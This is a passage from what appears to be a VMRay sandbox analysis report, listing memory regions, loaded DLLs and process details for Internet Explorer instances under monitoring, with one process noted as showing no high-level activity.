private_0x00000000024d0000 0x024d0000 0x025cffff Private Memory Readable, Writable True False False -
private_0x0000000002610000 0x02610000 0x0264ffff Private Memory Readable, Writable True False False -
private_0x0000000002650000 0x02650000 0x0268ffff Private Memory Readable, Writable True False False -
private_0x00000000026b0000 0x026b0000 0x026effff Private Memory Readable, Writable True False False -
private_0x0000000002700000 0x02700000 0x027fffff Private Memory Readable, Writable True False False -
private_0x0000000002800000 0x02800000 0x0283ffff Private Memory Readable, Writable True False False -
private_0x0000000002860000 0x02860000 0x0295ffff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x029fffff Private Memory Readable, Writable True False False -
private_0x0000000002a20000 0x02a20000 0x02a5ffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02bbffff Private Memory Readable, Writable True False False -
private_0x0000000002be0000 0x02be0000 0x02cdffff Private Memory Readable, Writable True False False -
private_0x0000000002d30000 0x02d30000 0x02d6ffff Private Memory Readable, Writable True False False -
private_0x0000000002d80000 0x02d80000 0x02e7ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002e80000 0x02e80000 0x031c2fff Pagefile Backed Memory Readable True False False -
private_0x0000000003240000 0x03240000 0x0333ffff Private Memory Readable, Writable True False False -
private_0x0000000003400000 0x03400000 0x034fffff Private Memory Readable, Writable True False False -
private_0x0000000003500000 0x03500000 0x035fffff Private Memory Readable, Writable True False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
ieframe.dll 0x725d0000 0x7304ffff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73470000 0x734a2fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x734b0000 0x734c2fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x734d0000 0x7350bfff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x735e0000 0x735e5fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x735f0000 0x735f8fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73600000 0x73637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x73640000 0x73645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x73650000 0x73654fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736abfff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x736e0000 0x736e7fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x736f0000 0x736fdfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x73700000 0x73759fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x73780000 0x7378cfff Memory Mapped File Readable, Writable, Executable False False False -
rasman.dll 0x73790000 0x737a4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x737b0000 0x73801fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x73a70000 0x73a90fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73ba0000 0x73c1ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75410000 0x7548afff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76a60000 0x76aa4fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77680000 0x77684fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 170 entries are omitted.
The remaining entries can be found in flog.txt.
Process #34: iexplore.exe
0 0
»
Information Value
ID #34
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1680 CREDAT:14337
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:03:25, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:01:55
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x22c
Parent PID 0x690 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 138
0x 1C0
0x 44C
0x 700
0x 5E0
0x 478
0x 474
0x 328
0x 604
0x 7C0
0x 7C8
0x 7B8
0x 7B4
0x 7A8
0x 584
0x 5E4
0x 3B0
0x 420
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
iexplore.exe.mui 0x000d0000 0x000d1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00180000 0x00180fff Memory Mapped File Readable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x00200fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000210000 0x00210000 0x00210fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable True False False -
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000240000 0x00240000 0x00241fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00251fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00260fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x0042dfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000430000 0x00430000 0x00430fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db 0x006e0000 0x006fffff Memory Mapped File Readable True False False -
private_0x0000000000700000 0x00700000 0x0070ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000710000 0x00710000 0x00890fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x008a0000 0x00b6efff Memory Mapped File Readable False False False -
pagefile_0x0000000000b70000 0x00b70000 0x00c4efff Pagefile Backed Memory Readable True False False -
private_0x0000000000c50000 0x00c50000 0x00c51fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000c60000 0x00c60000 0x00c61fff Pagefile Backed Memory Readable True False False -
index.dat 0x00c70000 0x00c7bfff Memory Mapped File Readable, Writable True True False
index.dat 0x00c70000 0x00c7ffff Memory Mapped File Readable, Writable True True False
index.dat 0x00c80000 0x00c87fff Memory Mapped File Readable, Writable True True False
index.dat 0x00c90000 0x00c9ffff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000ca0000 0x00ca0000 0x00ca0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000cb0000 0x00cb0000 0x00ceffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000cf0000 0x00cf0000 0x00cf0fff Pagefile Backed Memory Readable True False False -
private_0x0000000000d00000 0x00d00000 0x00d3ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x00d50000 0x00df5fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000e00000 0x00e00000 0x021fffff Pagefile Backed Memory Readable True False False -
private_0x0000000002210000 0x02210000 0x02211fff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0223ffff Private Memory Readable, Writable True False False -
private_0x0000000002240000 0x02240000 0x0227ffff Private Memory Readable, Writable True False False -
private_0x00000000022a0000 0x022a0000 0x022dffff Private Memory Readable, Writable True False False -
private_0x0000000002310000 0x02310000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002380000 0x02380000 0x0247ffff Private Memory Readable, Writable True False False -
private_0x00000000024b0000 0x024b0000 0x024effff Private Memory Readable, Writable True False False -
private_0x00000000024f0000 0x024f0000 0x025effff Private Memory Readable, Writable True False False -
private_0x0000000002660000 0x02660000 0x0275ffff Private Memory Readable, Writable True False False -
private_0x00000000027b0000 0x027b0000 0x027effff Private Memory Readable, Writable True False False -
private_0x00000000027f0000 0x027f0000 0x028effff Private Memory Readable, Writable True False False -
private_0x0000000002920000 0x02920000 0x02a1ffff Private Memory Readable, Writable True False False -
private_0x0000000002a90000 0x02a90000 0x02a9ffff Private Memory Readable, Writable True False False -
private_0x0000000002af0000 0x02af0000 0x02b2ffff Private Memory Readable, Writable True False False -
private_0x0000000002b80000 0x02b80000 0x02d7ffff Private Memory Readable, Writable True False False -
private_0x0000000002da0000 0x02da0000 0x02e9ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002ea0000 0x02ea0000 0x03292fff Pagefile Backed Memory Readable True False False -
private_0x00000000032b0000 0x032b0000 0x032effff Private Memory Readable, Writable True False False -
private_0x00000000033a0000 0x033a0000 0x033dffff Private Memory Readable, Writable True False False -
private_0x0000000003450000 0x03450000 0x0354ffff Private Memory Readable, Writable True False False -
private_0x00000000036c0000 0x036c0000 0x037bffff Private Memory Readable, Writable True False False -
staticcache.dat 0x037c0000 0x040effff Memory Mapped File Readable False False False -
private_0x000000005fff0000 0x5fff0000 0x5fffffff Private Memory Readable, Writable, Executable True False False -
comctl32.dll 0x72260000 0x722e3fff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x72360000 0x72454fff Memory Mapped File Readable, Writable, Executable False False False -
ieframe.dll 0x725d0000 0x7304ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcr90.dll 0x733d0000 0x73472fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x734b0000 0x734c2fff Memory Mapped File Readable, Writable, Executable False False False -
oleacc.dll 0x734d0000 0x7350bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x736f0000 0x736fdfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp90.dll 0x73920000 0x739adfff Memory Mapped File Readable, Writable, Executable False False False -
ieproxy.dll 0x739b0000 0x739dafff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x73a70000 0x73a90fff Memory Mapped File Readable, Writable, Executable False False False -
acroiehelpershim.dll 0x73aa0000 0x73ab0fff Memory Mapped File Readable, Writable, Executable False False False -
sqmapi.dll 0x73ac0000 0x73af2fff Memory Mapped File Readable, Writable, Executable False False False -
mlang.dll 0x73ac0000 0x73aedfff Memory Mapped File Readable, Writable, Executable False False False -
ieshims.dll 0x73b00000 0x73b34fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73ba0000 0x73c1ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x750a0000 0x750ebfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x75270000 0x7540cfff Memory Mapped File Readable, Writable, Executable False False False -
comdlg32.dll 0x75410000 0x7548afff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75770000 0x75781fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76a60000 0x76aa4fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e50000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77680000 0x77684fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 159 entries are omitted.
The remaining entries can be found in flog.txt.
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image